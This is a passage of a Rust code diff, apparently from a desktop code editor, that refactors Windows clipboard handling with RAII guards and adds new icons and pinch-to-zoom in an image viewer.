- let mut formats_map = FxHashMap::default();
- formats_map.insert(CF_UNICODETEXT.0 as u32, ClipboardFormatType::Text);
- formats_map.insert(*CLIPBOARD_PNG_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(*CLIPBOARD_GIF_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(*CLIPBOARD_JPG_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(*CLIPBOARD_SVG_FORMAT, ClipboardFormatType::Image);
- formats_map.insert(CF_DIB.0 as u32, ClipboardFormatType::Image);
- formats_map.insert(CF_HDROP.0 as u32, ClipboardFormatType::Files);
- formats_map
-});
static IMAGE_FORMATS_MAP: LazyLock<FxHashMap<u32, ImageFormat>> = LazyLock::new(|| {
- let mut formats_map = FxHashMap::default();
- formats_map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png);
- formats_map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif);
- formats_map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg);
- formats_map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg);
- formats_map
+ let mut map = FxHashMap::default();
+ map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png);
+ map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif);
+ map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg);
+ map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg);
+ map
});
-#[derive(Debug, Clone, Copy)]
-enum ClipboardFormatType {
- Text,
- Image,
- Files,
+fn register_clipboard_format(format: PCWSTR) -> u32 {
+ let ret = unsafe { RegisterClipboardFormatW(format) };
+ if ret == 0 {
+ panic!(
+ "Error when registering clipboard format: {}",
+ std::io::Error::last_os_error()
+ );
+ }
+ log::debug!(
+ "Registered clipboard format {} as {}",
+ unsafe { format.display() },
+ ret
+ );
+ ret
+}
+
+fn get_clipboard_data(format: u32) -> Option<LockedGlobal> {
+ let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0);
+ LockedGlobal::lock(global)
}
pub(crate) fn write_to_clipboard(item: ClipboardItem) {
- with_clipboard(|| write_to_clipboard_inner(item));
+ let Some(_clip) = ClipboardGuard::open() else {
+ return;
+ };
+
+ let result: Result<()> = (|| {
+ unsafe { EmptyClipboard()? };
+ for entry in item.entries() {
+ match entry {
+ ClipboardEntry::String(string) => write_string(string)?,
+ ClipboardEntry::Image(image) => write_image(image)?,
+ ClipboardEntry::ExternalPaths(_) => {}
+ }
+ }
+ Ok(())
+ })();
+
+ if let Err(e) = result {
+ log::error!("Failed to write to clipboard: {e}");
+ }
}
pub(crate) fn read_from_clipboard() -> Option<ClipboardItem> {
- with_clipboard(|| {
- with_best_match_format(|item_format| match format_to_type(item_format) {
- ClipboardFormatType::Text => read_string_from_clipboard(),
- ClipboardFormatType::Image => read_image_from_clipboard(item_format),
- ClipboardFormatType::Files => read_files_from_clipboard(),
- })
- })
- .flatten()
+ let _clip = ClipboardGuard::open()?;
+
+ let mut entries = Vec::new();
+ let mut have_text = false;
+ let mut have_image = false;
+ let mut have_files = false;
+
+ let count = unsafe { CountClipboardFormats() };
+ let mut format = 0;
+ for _ in 0..count {
+ format = unsafe { EnumClipboardFormats(format) };
+
+ if !have_text && format == CF_UNICODETEXT.0 as u32 {
+ if let Some(entry) = read_string() {
+ entries.push(entry);
+ have_text = true;
+ }
+ } else if !have_image && is_image_format(format) {
+ if let Some(entry) = read_image(format) {
+ entries.push(entry);
+ have_image = true;
+ }
+ } else if !have_files && format == CF_HDROP.0 as u32 {
+ if let Some(entry) = read_files() {
+ entries.push(entry);
+ have_files = true;
+ }
+ }
+ }
+
+ if entries.is_empty() {
+ log_unsupported_clipboard_formats();
+ return None;
+ }
+ Some(ClipboardItem { entries })
}
pub(crate) fn with_file_names<F>(hdrop: HDROP, mut f: F)
@@ -97,359 +142,247 @@ where
}
match String::from_utf16(&buffer[0..filename_length]) {
Ok(file_name) => f(file_name),
- Err(e) => {
- log::error!("dragged file name is not UTF-16: {}", e)
- }
+ Err(e) => log::error!("dragged file name is not UTF-16: {}", e),
}
}
}
-fn with_clipboard<F, T>(f: F) -> Option<T>
-where
- F: FnOnce() -> T,
-{
- match unsafe { OpenClipboard(None) } {
- Ok(()) => {
- let result = f();
- if let Err(e) = unsafe { CloseClipboard() } {
- log::error!("Failed to close clipboard: {e}",);
- }
- Some(result)
- }
- Err(e) => {
- log::error!("Failed to open clipboard: {e}",);
- None
- }
+fn set_clipboard_bytes<T>(data: &[T], format: u32) -> Result<()> {
+ unsafe {
+ let global = Owned::new(GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?);
+ let ptr = GlobalLock(*global);
+ anyhow::ensure!(!ptr.is_null(), "GlobalLock returned null");
+ std::ptr::copy_nonoverlapping(data.as_ptr(), ptr as _, data.len());
+ GlobalUnlock(*global).ok();
+ SetClipboardData(format, Some(HANDLE(global.0)))?;
+ // SetClipboardData succeeded — the system now owns the memory.
+ std::mem::forget(global);
}
+ Ok(())
}
-fn register_clipboard_format(format: PCWSTR) -> u32 {
- let ret = unsafe { RegisterClipboardFormatW(format) };
- if ret == 0 {
- panic!(
- "Error when registering clipboard format: {}",
- std::io::Error::last_os_error()
- );
+fn get_clipboard_string(format: u32) -> Option<String> {
+ let locked = get_clipboard_data(format)?;
+ let bytes = locked.as_bytes();
+ let words_len = bytes.len() / std::mem::size_of::<u16>();
+ if words_len == 0 {
+ return Some(String::new());
}
- log::debug!(
- "Registered clipboard format {} as {}",
- unsafe { format.display() },
- ret
- );
- ret
+ let slice = unsafe { std::slice::from_raw_parts(bytes.as_ptr() as *const u16, words_len) };
+ let actual_len = slice.iter().position(|&c| c == 0).unwrap_or(words_len);
+ Some(String::from_utf16_lossy(&slice[..actual_len]))
}
-#[inline]
-fn format_to_type(item_format: u32) -> &'static ClipboardFormatType {
- FORMATS_MAP.get(&item_format).unwrap()
-}
-
-// Currently, we only write the first item.
-fn write_to_clipboard_inner(item: ClipboardItem) -> Result<()> {
- unsafe {
- EmptyClipboard()?;
- }
- match item.entries().first() {
- Some(entry) => match entry {
- ClipboardEntry::String(string) => {
- write_string_to_clipboard(string)?;
- }
- ClipboardEntry::Image(image) => {
- write_image_to_clipboard(image)?;
- }
- ClipboardEntry::ExternalPaths(_) => {}
- },
- None => {
- // Writing an empty list of entries just clears the clipboard.
- }
- }
- Ok(())
+fn is_image_format(format: u32) -> bool {
+ IMAGE_FORMATS_MAP.contains_key(&format) || format == CF_DIB.0 as u32
}
-fn write_string_to_clipboard(item: &ClipboardString) -> Result<()> {
- let encode_wide = item.text.encode_utf16().chain(Some(0)).collect_vec();
- set_data_to_clipboard(&encode_wide, CF_UNICODETEXT.0 as u32)?;
+fn write_string(item: &ClipboardString) -> Result<()> {
+ let wide: Vec<u16> = item.text.encode_utf16().chain(Some(0)).collect_vec();
+ set_clipboard_bytes(&wide, CF_UNICODETEXT.0 as u32)?;
if let Some(metadata) = item.metadata.as_ref() {
- let hash_result = {
- let hash = ClipboardString::text_hash(&item.text);
- hash.to_ne_bytes()
- };
- let encode_wide =
- unsafe { std::slice::from_raw_parts(hash_result.as_ptr().cast::<u16>(), 4) };
- set_data_to_clipboard(encode_wide, *CLIPBOARD_HASH_FORMAT)?;
-
- let metadata_wide = metadata.encode_utf16().chain(Some(0)).collect_vec();
- set_data_to_clipboard(&metadata_wide, *CLIPBOARD_METADATA_FORMAT)?;
+ let hash_bytes = ClipboardString::text_hash(&item.text).to_ne_bytes();
+ set_clipboard_bytes(&hash_bytes, *CLIPBOARD_HASH_FORMAT)?;
+
+ let wide: Vec<u16> = metadata.encode_utf16().chain(Some(0)).collect_vec();
+ set_clipboard_bytes(&wide, *CLIPBOARD_METADATA_FORMAT)?;
}
Ok(())
}
-fn set_data_to_clipboard<T>(data: &[T], format: u32) -> Result<()> {
- unsafe {
- let global = GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?;
- let handle = GlobalLock(global);
- std::ptr::copy_nonoverlapping(data.as_ptr(), handle as _, data.len());
- let _ = GlobalUnlock(global);
- SetClipboardData(format, Some(HANDLE(global.0)))?;
+fn write_image(item: &Image) -> Result<()> {
+ let native_format = match item.format {
+ ImageFormat::Svg => Some(*CLIPBOARD_SVG_FORMAT),
+ ImageFormat::Gif => Some(*CLIPBOARD_GIF_FORMAT),
+ ImageFormat::Png => Some(*CLIPBOARD_PNG_FORMAT),
+ ImageFormat::Jpeg => Some(*CLIPBOARD_JPG_FORMAT),
+ _ => None,
+ };
+ if let Some(format) = native_format {
+ set_clipboard_bytes(item.bytes(), format)?;
}
- Ok(())
-}
-// Here writing PNG to the clipboard to better support other apps. For more info, please ref to
-// the PR.
-fn write_image_to_clipboard(item: &Image) -> Result<()> {
- match item.format {
- ImageFormat::Svg => set_data_to_clipboard(item.bytes(), *CLIPBOARD_SVG_FORMAT)?,
- ImageFormat::Gif => {
- set_data_to_clipboard(item.bytes(), *CLIPBOARD_GIF_FORMAT)?;
- let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Gif)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
- }
- ImageFormat::Png => {
- set_data_to_clipboard(item.bytes(), *CLIPBOARD_PNG_FORMAT)?;
- let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Png)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
- }
- ImageFormat::Jpeg => {
- set_data_to_clipboard(item.bytes(), *CLIPBOARD_JPG_FORMAT)?;
- let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Jpeg)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
- }
- other => {
- log::warn!(
- "Clipboard unsupported image format: {:?}, convert to PNG instead.",
- item.format
- );
- let png_bytes = convert_image_to_png_format(item.bytes(), other)?;
- set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
+ // Also provide a PNG copy for broad compatibility.
+ // SVG can't be rasterized by the image crate, so skip it.
+ if item.format != ImageFormat::Svg && native_format != Some(*CLIPBOARD_PNG_FORMAT) {
+ if let Some(png_bytes) = convert_to_png(item.bytes(), item.format) {
+ set_clipboard_bytes(&png_bytes, *CLIPBOARD_PNG_FORMAT)?;
}
}
Ok(())
}
-fn convert_image_to_png_format(bytes: &[u8], image_format: ImageFormat) -> Result<Vec<u8>> {
- let image =
- image::load_from_memory_with_format(bytes, gpui_image_format_to_image(image_format))?;
- let mut output_buf = Vec::new();
- image.write_to(
- &mut std::io::Cursor::new(&mut output_buf),
- image::ImageFormat::Png,
- )?;
- Ok(output_buf)
-}
-
-// Here, we enumerate all formats on the clipboard and find the first one that we can process.
-// The reason we don't use `GetPriorityClipboardFormat` is that it sometimes returns the
-// wrong format.
-// For instance, when copying a JPEG image from Microsoft Word, there may be several formats
-// on the clipboard: Jpeg, Png, Svg.
-// If we use `GetPriorityClipboardFormat`, it will return Svg, which is not what we want.
-fn with_best_match_format<F>(f: F) -> Option<ClipboardItem>
-where
- F: Fn(u32) -> Option<ClipboardEntry>,
-{
- let mut text = None;
- let mut image = None;
- let mut files = None;
- let count = unsafe { CountClipboardFormats() };
- let mut clipboard_format = 0;
- for _ in 0..count {
- clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) };
- let Some(item_format) = FORMATS_MAP.get(&clipboard_format) else {
- continue;
- };
- let bucket = match item_format {
- ClipboardFormatType::Text if text.is_none() => &mut text,
- ClipboardFormatType::Image if image.is_none() => &mut image,
- ClipboardFormatType::Files if files.is_none() => &mut files,
- _ => continue,
- };
- if let Some(entry) = f(clipboard_format) {
- *bucket = Some(entry);
- }
- }
-
- if let Some(entry) = [image, files, text].into_iter().flatten().next() {
- return Some(ClipboardItem {
- entries: vec![entry],
- });
- }
-
- // log the formats that we don't support yet.
- {
- clipboard_format = 0;
- for _ in 0..count {
- clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) };
- let mut buffer = [0u16; 64];
- unsafe { GetClipboardFormatNameW(clipboard_format, &mut buffer) };
- let format_name = String::from_utf16_lossy(&buffer);
- log::warn!(
- "Try to paste with unsupported clipboard format: {}, {}.",
- clipboard_format,
- format_name
- );
- }
- }
- None
+fn convert_to_png(bytes: &[u8], format: ImageFormat) -> Option<Vec<u8>> {
+ let img_format = gpui_to_image_format(format)?;
+ let image = image::load_from_memory_with_format(bytes, img_format)
+ .map_err(|e| log::warn!("Failed to decode image for PNG conversion: {e}"))
+ .ok()?;
+ let mut buf = Vec::new();
+ image
+ .write_to(&mut std::io::Cursor::new(&mut buf), image::ImageFormat::Png)
+ .map_err(|e| log::warn!("Failed to encode PNG: {e}"))
+ .ok()?;
+ Some(buf)
}
-fn read_string_from_clipboard() -> Option<ClipboardEntry> {
- let text = with_clipboard_data(CF_UNICODETEXT.0 as u32, |data_ptr, _| {
- let pcwstr = PCWSTR(data_ptr as *const u16);
- String::from_utf16_lossy(unsafe { pcwstr.as_wide() })
- })?;
- let Some(hash) = read_hash_from_clipboard() else {
- return Some(ClipboardEntry::String(ClipboardString::new(text)));
- };
- let Some(metadata) = read_metadata_from_clipboard() else {
- return Some(ClipboardEntry::String(ClipboardString::new(text)));
- };
- if hash == ClipboardString::text_hash(&text) {
- Some(ClipboardEntry::String(ClipboardString {
- text,
- metadata: Some(metadata),
- }))
- } else {
- Some(ClipboardEntry::String(ClipboardString::new(text)))
- }
+fn read_string() -> Option<ClipboardEntry> {
+ let text = get_clipboard_string(CF_UNICODETEXT.0 as u32)?;
+ let metadata = read_clipboard_metadata(&text);
+ Some(ClipboardEntry::String(ClipboardString { text, metadata }))
}
-fn read_hash_from_clipboard() -> Option<u64> {
- if unsafe { IsClipboardFormatAvailable(*CLIPBOARD_HASH_FORMAT).is_err() } {
+fn read_clipboard_metadata(text: &str) -> Option<String> {
+ let locked = get_clipboard_data(*CLIPBOARD_HASH_FORMAT)?;
+ let hash_bytes: [u8; 8] = locked.as_bytes().get(..8)?.try_into().ok()?;
+ let hash = u64::from_ne_bytes(hash_bytes);
+ if hash != ClipboardString::text_hash(text) {
return None;
}
- with_clipboard_data(*CLIPBOARD_HASH_FORMAT, |data_ptr, size| {
- if size < 8 {
- return None;
- }
- let hash_bytes: [u8; 8] = unsafe {
- std::slice::from_raw_parts(data_ptr.cast::<u8>(), 8)
- .try_into()
- .ok()
- }?;
- Some(u64::from_ne_bytes(hash_bytes))
- })?
+ get_clipboard_string(*CLIPBOARD_METADATA_FORMAT)
}
-fn read_metadata_from_clipboard() -> Option<String> {
- unsafe { IsClipboardFormatAvailable(*CLIPBOARD_METADATA_FORMAT).ok()? };
- with_clipboard_data(*CLIPBOARD_METADATA_FORMAT, |data_ptr, _size| {
- let pcwstr = PCWSTR(data_ptr as *const u16);
- String::from_utf16_lossy(unsafe { pcwstr.as_wide() })
- })
+fn read_image(format: u32) -> Option<ClipboardEntry> {
+ let locked = get_clipboard_data(format)?;
+ let (bytes, image_format) = if format == CF_DIB.0 as u32 {
+ (convert_dib_to_bmp(locked.as_bytes())?, ImageFormat::Bmp)
+ } else {
+ let image_format = *IMAGE_FORMATS_MAP.get(&format)?;
+ (locked.as_bytes().to_vec(), image_format)
+ };
+ let id = hash(&bytes);
+ Some(ClipboardEntry::Image(Image {
+ format: image_format,
+ bytes,
+ id,
+ }))
}
-fn read_image_from_clipboard(format: u32) -> Option<ClipboardEntry> {
- // Handle CF_DIB format specially - it's raw bitmap data that needs conversion
- if format == CF_DIB.0 as u32 {
- return read_image_for_type(format, ImageFormat::Bmp, Some(convert_dib_to_bmp));
- }
- let image_format = format_number_to_image_format(format)?;
- read_image_for_type::<fn(&[u8]) -> Option<Vec<u8>>>(format, *image_format, None)
+fn read_files() -> Option<ClipboardEntry> {
+ let locked = get_clipboard_data(CF_HDROP.0 as u32)?;
+ let hdrop = HDROP(locked.ptr as *mut _);
+ let mut filenames = Vec::new();
+ with_file_names(hdrop, |name| filenames.push(std::path::PathBuf::from(name)));
+ Some(ClipboardEntry::ExternalPaths(ExternalPaths(
+ filenames.into(),
+ )))
}
-/// Convert DIB data to BMP file format.
-/// DIB is essentially BMP without a file header, so we just need to add the 14-byte BITMAPFILEHEADER.
-fn convert_dib_to_bmp(dib_data: &[u8]) -> Option<Vec<u8>> {
- if dib_data.len() < 40 {
+/// DIB is BMP without the 14-byte BITMAPFILEHEADER. Prepend one.
+fn convert_dib_to_bmp(dib: &[u8]) -> Option<Vec<u8>> {
+ if dib.len() < 40 {
return None;
}
- let file_size = 14 + dib_data.len() as u32;
- // Calculate pixel data offset
- let header_size = u32::from_le_bytes(dib_data[0..4].try_into().ok()?);
- let bit_count = u16::from_le_bytes(dib_data[14..16].try_into().ok()?);
- let compression = u32::from_le_bytes(dib_data[16..20].try_into().ok()?);
+ let header_size = u32::from_le_bytes(dib[0..4].try_into().ok()?);
+ let bit_count = u16::from_le_bytes(dib[14..16].try_into().ok()?);
+ let compression = u32::from_le_bytes(dib[16..20].try_into().ok()?);
- // Calculate color table size
let color_table_size = if bit_count <= 8 {
- let colors_used = u32::from_le_bytes(dib_data[32..36].try_into().ok()?);
- let num_colors = if colors_used == 0 {
+ let colors_used = u32::from_le_bytes(dib[32..36].try_into().ok()?);
+ (if colors_used == 0 {
1u32 << bit_count
} else {
colors_used
- };
- num_colors * 4
+ }) * 4
} else if compression == 3 {
12 // BI_BITFIELDS
} else {
0
};
- let pixel_data_offset = 14 + header_size + color_table_size;
+ let pixel_offset = 14 + header_size + color_table_size;
+ let file_size = 14 + dib.len() as u32;
- // Build BITMAPFILEHEADER (14 bytes)
- let mut bmp_data = Vec::with_capacity(file_size as usize);
- bmp_data.extend_from_slice(b"BM"); // Signature
- bmp_data.extend_from_slice(&file_size.to_le_bytes()); // File size
- bmp_data.extend_from_slice(&[0u8; 4]); // Reserved
- bmp_data.extend_from_slice(&pixel_data_offset.to_le_bytes()); // Pixel data offset
- bmp_data.extend_from_slice(dib_data); // DIB data
+ let mut bmp = Vec::with_capacity(file_size as usize);
+ bmp.extend_from_slice(b"BM");
+ bmp.extend_from_slice(&file_size.to_le_bytes());
+ bmp.extend_from_slice(&[0u8; 4]); // reserved
+ bmp.extend_from_slice(&pixel_offset.to_le_bytes());
+ bmp.extend_from_slice(dib);
+ Some(bmp)
+}
- Some(bmp_data)
+fn log_unsupported_clipboard_formats() {
+ let count = unsafe { CountClipboardFormats() };
+ let mut format = 0;
+ for _ in 0..count {
+ format = unsafe { EnumClipboardFormats(format) };
+ let mut buffer = [0u16; 64];
+ unsafe { GetClipboardFormatNameW(format, &mut buffer) };
+ let format_name = String::from_utf16_lossy(&buffer);
+ log::warn!(
+ "Try to paste with unsupported clipboard format: {}, {}.",
+ format,
+ format_name
+ );
+ }
}
-#[inline]
-fn format_number_to_image_format(format_number: u32) -> Option<&'static ImageFormat> {
- IMAGE_FORMATS_MAP.get(&format_number)
+fn gpui_to_image_format(value: ImageFormat) -> Option<image::ImageFormat> {
+ match value {
+ ImageFormat::Png => Some(image::ImageFormat::Png),
+ ImageFormat::Jpeg => Some(image::ImageFormat::Jpeg),
+ ImageFormat::Webp => Some(image::ImageFormat::WebP),
+ ImageFormat::Gif => Some(image::ImageFormat::Gif),
+ ImageFormat::Bmp => Some(image::ImageFormat::Bmp),
+ ImageFormat::Tiff => Some(image::ImageFormat::Tiff),
+ other => {
+ log::warn!("No image crate equivalent for format: {other:?}");
+ None
+ }
+ }
}
-fn read_image_for_type<F>(
- format_number: u32,
- format: ImageFormat,
- convert: Option<F>,
-) -> Option<ClipboardEntry>
-where
- F: FnOnce(&[u8]) -> Option<Vec<u8>>,
-{
- let (bytes, id) = with_clipboard_data(format_number, |data_ptr, size| {
- let raw_bytes = unsafe { std::slice::from_raw_parts(data_ptr as *const u8, size) };
- let bytes = match convert {
- Some(converter) => converter(raw_bytes)?,
- None => raw_bytes.to_vec(),
- };
- let id = hash(&bytes);
- Some((bytes, id))
- })??;
- Some(ClipboardEntry::Image(Image { format, bytes, id }))
+struct ClipboardGuard;
+
+impl ClipboardGuard {
+ fn open() -> Option<Self> {
+ match unsafe { OpenClipboard(None) } {
+ Ok(()) => Some(Self),
+ Err(e) => {
+ log::error!("Failed to open clipboard: {e}");
+ None
+ }
+ }
+ }
}
-fn read_files_from_clipboard() -> Option<ClipboardEntry> {
- let filenames = with_clipboard_data(CF_HDROP.0 as u32, |data_ptr, _size| {
- let hdrop = HDROP(data_ptr);
- let mut filenames = Vec::new();
- with_file_names(hdrop, |file_name| {
- filenames.push(std::path::PathBuf::from(file_name));
- });
- filenames
- })?;
- Some(ClipboardEntry::ExternalPaths(ExternalPaths(
- filenames.into(),
- )))
+impl Drop for ClipboardGuard {
+ fn drop(&mut self) {
+ if let Err(e) = unsafe { CloseClipboard() } {
+ log::error!("Failed to close clipboard: {e}");
+ }
+ }
}
-fn with_clipboard_data<F, R>(format: u32, f: F) -> Option<R>
-where
- F: FnOnce(*mut std::ffi::c_void, usize) -> R,
-{
- let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0);
- let size = unsafe { GlobalSize(global) };
- let data_ptr = unsafe { GlobalLock(global) };
- let result = f(data_ptr, size);
- unsafe { GlobalUnlock(global).ok() };
- Some(result)
+struct LockedGlobal {
+ global: HGLOBAL,
+ ptr: *const u8,
+ size: usize,
}
-fn gpui_image_format_to_image(value: ImageFormat) -> image::ImageFormat {
- match value {
- ImageFormat::Png => image::ImageFormat::Png,
- ImageFormat::Jpeg => image::ImageFormat::Jpeg,
- ImageFormat::Webp => image::ImageFormat::WebP,
- ImageFormat::Gif => image::ImageFormat::Gif,
- // TODO: ImageFormat::Svg
- ImageFormat::Bmp => image::ImageFormat::Bmp,
- ImageFormat::Tiff => image::ImageFormat::Tiff,
- _ => unreachable!(),
+impl LockedGlobal {
+ fn lock(global: HGLOBAL) -> Option<Self> {
+ let size = unsafe { GlobalSize(global) };
+ let ptr = unsafe { GlobalLock(global) };
+ if ptr.is_null() {
+ return None;
+ }
+ Some(Self {
+ global,
+ ptr: ptr as *const u8,
+ size,
+ })
+ }
+
+ fn as_bytes(&self) -> &[u8] {
+ unsafe { std::slice::from_raw_parts(self.ptr, self.size) }
+ }
+}
+
+impl Drop for LockedGlobal {
+ fn drop(&mut self) {
+ unsafe { GlobalUnlock(self.global).ok() };
}
}
@@ -155,6 +155,7 @@ async fn cleanup_staging_path(staging_path: &Path, asset_kind: AssetKind) {
}
async fn finalize_download(staging_path: &Path, destination_path: &Path) -> Result<()> {
+ _ = async_fs::remove_dir_all(destination_path).await;
async_fs::rename(staging_path, destination_path)
.await
.with_context(|| format!("renaming {staging_path:?} to {destination_path:?}"))?;
@@ -22,11 +22,13 @@ pub enum IconName {
AiOllama,
AiOpenAi,
AiOpenAiCompat,
+ AiOpenCode,
AiOpenRouter,
AiVercel,
AiVZero,
AiXAi,
AiZed,
+ Archive,
ArrowCircle,
ArrowDown,
ArrowDown10,
@@ -113,6 +115,7 @@ pub enum IconName {
ExpandUp,
ExpandVertical,
Eye,
+ EyeOff,
FastForward,
FastForwardOff,
File,
@@ -130,8 +133,10 @@ pub enum IconName {
FileTree,
Filter,
Flame,
+ Focus,
Folder,
FolderOpen,
+ FolderPlus,
FolderSearch,
Font,
FontSize,
@@ -147,6 +152,8 @@ pub enum IconName {
GitBranchPlus,
GitCommit,
GitGraph,
+ GitMergeConflict,
+ GitWorktree,
Github,
Hash,
HistoryRerun,
@@ -215,6 +222,9 @@ pub enum IconName {
Settings,
ShieldCheck,
Shift,
+ SignalHigh,
+ SignalLow,
+ SignalMedium,
Slash,
Sliders,
Space,
@@ -243,6 +253,10 @@ pub enum IconName {
ThinkingModeOff,
Thread,
ThreadFromSummary,
+ ThreadsSidebarLeftClosed,
+ ThreadsSidebarLeftOpen,
+ ThreadsSidebarRightClosed,
+ ThreadsSidebarRightOpen,
ThumbsDown,
ThumbsUp,
TodoComplete,
@@ -271,8 +285,6 @@ pub enum IconName {
UserRoundPen,
Warning,
WholeWord,
- WorkspaceNavClosed,
- WorkspaceNavOpen,
XCircle,
XCircleFilled,
ZedAgent,
@@ -6,15 +6,17 @@ use std::path::Path;
use anyhow::Context as _;
use editor::{EditorSettings, items::entry_git_aware_label_color};
use file_icons::FileIcons;
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+use gpui::PinchEvent;
use gpui::{
AnyElement, App, Bounds, Context, DispatchPhase, Element, ElementId, Entity, EventEmitter,
- FocusHandle, Focusable, GlobalElementId, InspectorElementId, InteractiveElement, IntoElement,
- LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, ParentElement, Pixels,
- Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, Task, WeakEntity, Window, actions,
- checkerboard, div, img, point, px, size,
+ FocusHandle, Focusable, Font, GlobalElementId, InspectorElementId, InteractiveElement,
+ IntoElement, LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent,
+ ParentElement, Pixels, Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, Task,
+ WeakEntity, Window, actions, checkerboard, div, img, point, px, size,
};
use language::File as _;
-use persistence::IMAGE_VIEWER;
+use persistence::ImageViewerDb;
use project::{ImageItem, Project, ProjectPath, image_store::ImageItemEvent};
use settings::Settings;
use theme::ThemeSettings;
@@ -24,7 +26,7 @@ use workspace::{
ItemId, ItemSettings, Pane, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace,
WorkspaceId, delete_unloaded_items,
invalid_item_view::InvalidItemView,
- item::{BreadcrumbText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams},
+ item::{HighlightedText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams},
};
pub use crate::image_info::*;
@@ -260,6 +262,12 @@ impl ImageView {
cx.notify();
}
}
+
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn handle_pinch(&mut self, event: &PinchEvent, _window: &mut Window, cx: &mut Context<Self>) {
+ let zoom_factor = 1.0 + event.delta;
+ self.set_zoom(self.zoom_level * zoom_factor, Some(event.position), cx);
+ }
}
struct ImageContentElement {
@@ -522,15 +530,17 @@ impl Item for ImageView {
}
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
let text = breadcrumbs_text_for_image(self.project.read(cx), self.image_item.read(cx), cx);
- let settings = ThemeSettings::get_global(cx);
+ let font = ThemeSettings::get_global(cx).buffer_font.clone();
- Some(vec![BreadcrumbText {
- text,
- highlights: None,
- font: Some(settings.buffer_font.clone()),
- }])
+ Some((
+ vec![HighlightedText {
+ text: text.into(),
+ highlights: vec![],
+ }],
+ Some(font),
+ ))
}
fn can_split(&self) -> bool {
@@ -590,8 +600,9 @@ impl SerializableItem for ImageView {
window: &mut Window,
cx: &mut App,
) -> Task<anyhow::Result<Entity<Self>>> {
+ let db = ImageViewerDb::global(cx);
window.spawn(cx, async move |cx| {
- let image_path = IMAGE_VIEWER
+ let image_path = db
.get_image_path(item_id, workspace_id)?
.context("No image path found")?;
@@ -624,13 +635,8 @@ impl SerializableItem for ImageView {
_window: &mut Window,
cx: &mut App,
) -> Task<anyhow::Result<()>> {
- delete_unloaded_items(
- alive_items,
- workspace_id,
- "image_viewers",
- &IMAGE_VIEWER,
- cx,
- )
+ let db = ImageViewerDb::global(cx);
+ delete_unloaded_items(alive_items, workspace_id, "image_viewers", &db, cx)
}
fn serialize(
@@ -644,12 +650,11 @@ impl SerializableItem for ImageView {
let workspace_id = workspace.database_id()?;
let image_path = self.image_item.read(cx).abs_path(cx)?;
+ let db = ImageViewerDb::global(cx);
Some(cx.background_spawn({
async move {
log::debug!("Saving image at path {image_path:?}");
- IMAGE_VIEWER
- .save_image_path(item_id, workspace_id, image_path)
- .await
+ db.save_image_path(item_id, workspace_id, image_path).await
}
}))
}
@@ -679,8 +684,9 @@ impl Render for ImageView {
.size_full()
.relative()
.bg(cx.theme().colors().editor_background)
- .child(
- div()
+ .child({
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ let container = div()
.id("image-container")
.size_full()
.overflow_hidden()
@@ -690,13 +696,34 @@ impl Render for ImageView {
gpui::CursorStyle::OpenHand
})
.on_scroll_wheel(cx.listener(Self::handle_scroll_wheel))
+ .on_pinch(cx.listener(Self::handle_pinch))
.on_mouse_down(MouseButton::Left, cx.listener(Self::handle_mouse_down))
.on_mouse_down(MouseButton::Middle, cx.listener(Self::handle_mouse_down))
.on_mouse_up(MouseButton::Left, cx.listener(Self::handle_mouse_up))
.on_mouse_up(MouseButton::Middle, cx.listener(Self::handle_mouse_up))
.on_mouse_move(cx.listener(Self::handle_mouse_move))
- .child(ImageContentElement::new(cx.entity())),
- )
+ .child(ImageContentElement::new(cx.entity()));
+
+ #[cfg(not(any(target_os = "linux", target_os = "macos")))]
+ let container = div()
+ .id("image-container")
+ .size_full()
+ .overflow_hidden()
+ .cursor(if self.is_dragging() {
+ gpui::CursorStyle::ClosedHand
+ } else {
+ gpui::CursorStyle::OpenHand
+ })
+ .on_scroll_wheel(cx.listener(Self::handle_scroll_wheel))
+ .on_mouse_down(MouseButton::Left, cx.listener(Self::handle_mouse_down))
+ .on_mouse_down(MouseButton::Middle, cx.listener(Self::handle_mouse_down))
+ .on_mouse_up(MouseButton::Left, cx.listener(Self::handle_mouse_up))
+ .on_mouse_up(MouseButton::Middle, cx.listener(Self::handle_mouse_up))
+ .on_mouse_move(cx.listener(Self::handle_mouse_move))
+ .child(ImageContentElement::new(cx.entity()));
+
+ container
+ })
}
}
@@ -878,7 +905,7 @@ mod persistence {
